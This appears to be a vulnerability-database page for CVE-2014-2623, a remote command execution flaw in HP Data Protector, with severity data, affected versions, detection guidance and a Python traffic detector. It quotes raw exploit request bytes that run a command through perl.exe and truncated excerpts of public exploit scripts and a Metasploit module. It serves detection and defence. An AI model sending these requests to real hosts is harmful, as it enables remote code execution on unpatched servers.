CVE-2014-2623
Published 2014-07-18
Priority: P1 · 82 · critical · CVSS 2.0 score 10
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
ITW exploit · VulnCheck KEV
Exploited in the wild
EPSS: 89.39% (99.8th percentile)
Unspecified vulnerability in HP Storage Data Protector 8.x allows remote attackers to execute arbitrary code via unknown vectors.
Affected (5 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | data_protector | >= 7.0 < 7.03_108 | 7.03_108 |
| hp | data_protector | >= 8.0 < 8.15 | 8.15 |
| hp | data_protector | >= 9.0 < 9.06 | 9.06 |
| hp | storage_data_protector | — | — |
| hp | storage_data_protector | — | — |
Detection & IOCs (extracted from sources)
- bytes: `00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900`
- bytes: `00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000`
- bytes: `\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00`
- Detect exploit attempts by monitoring for TCP connections to port 5555 (OmniInet service) containing the opcode 28 pattern followed by '\perl.exe' and '-esystem(' strings in the payload.
- Alert on TCP/5555 payloads containing the hex sequence '32 00 01 01 01 01 01 01 00 01 00 01 00 01 00 01 01 00 20 32 38 00 5c 70 65 72 6c 2e 65 78 65 00 20 2d 65 73 79 73 74 65 6d', which encodes the opcode-28/perl.exe/-esystem exploit pattern.
- Detect spawning of cmd.exe or rundll32.exe as a child process of the OmniInet service (omniinet.exe) on Windows, which indicates successful command execution via this vulnerability.
- Watch for outbound SMB connections from the Data Protector host to attacker-controlled servers immediately after inbound connections on TCP/5555, as the Metasploit module uses a fake SMB server to deliver the DLL payload via rundll32.exe.
- CVE-2016-2004 exists because the patch for CVE-2014-2623 was incomplete; systems patched only for CVE-2014-2623 (versions before 7.03_108, 8.x before 8.15, 9.x before 9.06) remain exploitable.
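Added example, not from this page or any of the indexed sources: a Python detector that implements the first two network heuristics above over a raw TCP/5555 byte stream. It assumes the framing visible in the quoted byte samples (a 4-byte big-endian length prefix, then NUL-separated fields) and uses the request bytes quoted above as its constructed positive sample.

```python
import struct

# Markers named in the detection guidance on this page: the ASCII opcode "28" as
# its own NUL-terminated field, followed by "\perl.exe" and "-esystem(".
OPCODE_28_FIELD = b"28"
PERL_MARKER = b"\\perl.exe"
ESYSTEM_MARKER = b"-esystem("


def split_frames(stream: bytes) -> list:
    """Split a TCP/5555 byte stream into frame bodies.

    Assumed framing, taken from the samples quoted on this page: a 4-byte
    big-endian length followed by that many bytes (0x34 = 52 in both samples).
    A truncated trailing frame is still returned so partial captures get checked.
    """
    frames, pos = [], 0
    while pos + 4 <= len(stream):
        (length,) = struct.unpack(">I", stream[pos:pos + 4])
        frames.append(stream[pos + 4:pos + 4 + length])
        pos += 4 + length
    return frames


def is_opcode28_perl_exec(frame: bytes) -> bool:
    """True when the frame carries the opcode-28 / perl.exe / -esystem( pattern."""
    fields = frame.split(b"\x00")
    stripped = [f.strip(b" ") for f in fields]
    if OPCODE_28_FIELD not in stripped:
        return False
    # Only look at the fields that follow the opcode field.
    tail = b"\x00".join(fields[stripped.index(OPCODE_28_FIELD) + 1:])
    return PERL_MARKER in tail and ESYSTEM_MARKER in tail


def scan_stream(stream: bytes) -> list:
    """Indexes of frames in the stream that match; an empty list means nothing flagged."""
    return [i for i, body in enumerate(split_frames(stream)) if is_opcode28_perl_exec(body)]


# Constructed samples: the request bytes quoted on this page (opcode 28 running
# perl.exe -e system('whoami')), preceded by a made-up non-matching frame.
SAMPLE_EXPLOIT = bytes.fromhex(
    "00000034320001010101010100010001000100010100203238005c7065726c2e65786500"
    "202d6573797374656d282777686f616d69272900"
)
_BENIGN_BODY = b"2\x00 10\x00\x00\x00"
SAMPLE_BENIGN = struct.pack(">I", len(_BENIGN_BODY)) + _BENIGN_BODY

if __name__ == "__main__":
    print("flagged frames:", scan_stream(SAMPLE_BENIGN + SAMPLE_EXPLOIT))  # [1]
```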
CVSS provenance
- nvd (CVSS v2.0): 10.0 CRITICAL, vector AV:N/AC:L/Au:N/C:C/I:C/A:C
- vulncheck: 10.0 CRITICAL
GHSA
GHSA-89x3-hvxc-fwcx (ghsa_unreviewed · 2022-05-17): CVE-2014-2623 [HIGH] Unspecified vulnerability in HP Storage Data Protector 8
Unspecified vulnerability in HP Storage Data Protector 8.x allows remote attackers to execute arbitrary code via unknown vectors.
GHSA
GHSA-jrq2-fq6q-8g5w (ghsa_unreviewed · 2022-05-14 · CVSS 10.0): CVE-2016-2004 [CRITICAL] CWE-306 HPE Data Protector before 7
HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-2623.
VulnCheck
HP Data Protector Remote Command Execution (vulncheck · 2014 · CVSS 10.0): CVE-2014-2623 [CRITICAL]
Unspecified vulnerability in HP Storage Data Protector 8.x allows remote attackers to execute arbitrary code via unknown vectors.
Affected: HP storage_data_protector
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.akamai.com/blog/security/operation-prowli-traffic-manipulation-cryptocurrency-mining
No detection rules found.
Exploit-DB
HP Data Protector A.09.00 - Arbitrary Command Execution (exploitdb · 2016-05-26 · CVSS 9.8): CVE-2016-2004 [CRITICAL]
---
```python
#!/usr/bin/python
#
# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#
# This proof of concept demonstrates that enabling encrypted control communication on
# Data Protector agents does not provide any additional security.
# As it provides no authentication, it is not a viable workaround to prevent the
# exploitation of well-known Data Protector issues such as CVE-2014-2623
#
# This exploit establishes an unauthenticated encrypted communication channel to
# a Data Protector Agent and
```
Exploit-DB
HP Data Protector 8.10 - Remote Command Execution (Metasploit) (exploitdb · 2015-03-06): CVE-2014-2623
---
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'HP Data Protector 8.10 Remote Command Execution',
      'Description' => %q{
        This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary
        commands can be executed by sending crafted requests with opcode 28 to the OmniInet
        service listening on the TCP/5555 port. Since there is a strict length limitation on
        the command, rundll32.exe is executed, and the payload is provided through a DLL by a
        fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on
        Windows 7 SP1.
      },
      'Author'      => [
        'Christian Ramirez', # PO
```
Exploit-DB
HP Data Protector 8.x - Remote Command Execution (exploitdb · 2015-01-30 · CVSS 10.0): CVE-2014-2623 [CRITICAL]
---
```python
#!/usr/bin/python
# Exploit Title: HP-Data-Protector-8.x Remote command execution.
# Google Dork: -
# Date: 30/01/2015
# Exploit Author: Juttikhun Khamchaiyaphum
# Vendor Homepage: https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818
# Software Link: http://www8.hp.com/th/en/software-solutions/data-protector-backup-recovery-software/
# Version: 8.x
# Tested on: IA64 HP Server Rx3600
# CVE : CVE-2014-2623
# Usage: hp_data_protector_8_x.py "
import socket
import struct
import sys

def exploit(host, port, command):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((host, port))
        print "[+] Target connected."
        OFFSET_DEC_START = 133
        OFFSET_DEC = (OFFSET_DEC_START + len(command))
        # print "OFFSE
```
Exploit-DB
HP Data Protector Manager 8.10 - Remote Command Execution (exploitdb · 2014-07-14): CVE-2014-2623
---
```python
#!/usr/bin/python
# Exploit Title: HP-Data-Protector-8.10 Remote command execution.
# Date: July 11 2014
# Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org
# Exploit Author: Henoch (Chanoc) Barrera https://intrusionlabs.org
# Contacts: [email protected] and [email protected]
# Version: HP Data Protector manager 8.10 the last version
# Vendor web page: http://www8.hp.com/mx/es/software-solutions/software.html?compURI=1175640#.U8DhWaU_BjF
# Tested on: Windows 2003, Windows 2008 and Windows 2012 all languages
# Thanks: To GOD for giving us wisdom
# Description:
# A remote command execution is triggered when a crafted command is sent to the HP Data Protector Manager on TCP port 5555.
import soc
```
Metasploit
HP Data Protector 8.10 Remote Command Execution (metasploit)
This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary commands can be executed by sending crafted requests with opcode 28 to the OmniInet service listening on the TCP/5555 port. Since there is a strict length limitation on the command, rundll32.exe is executed, and the payload is provided through a DLL by a fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on Windows 7 SP1.
Nuclei
HP Data Protector - Arbitrary Command Execution (nuclei · CVSS 10.0): CVE-2016-2004 [CRITICAL]
HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
Template:
```yaml
id: CVE-2016-2004

info:
  name: HP Data Protector - Arbitrary Command Execution
  author: pussycat0x
  severity: critical
  description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrar
```
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/130658/HP-Data-Protector-8.10-Remote-Command-Execution.html
- http://www.exploit-db.com/exploits/34066/
- http://www.exploit-db.com/exploits/35961
- http://www.exploit-db.com/exploits/36304
- http://www.osvdb.org/109069
- http://www.securitytracker.com/id/1030583
- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04373818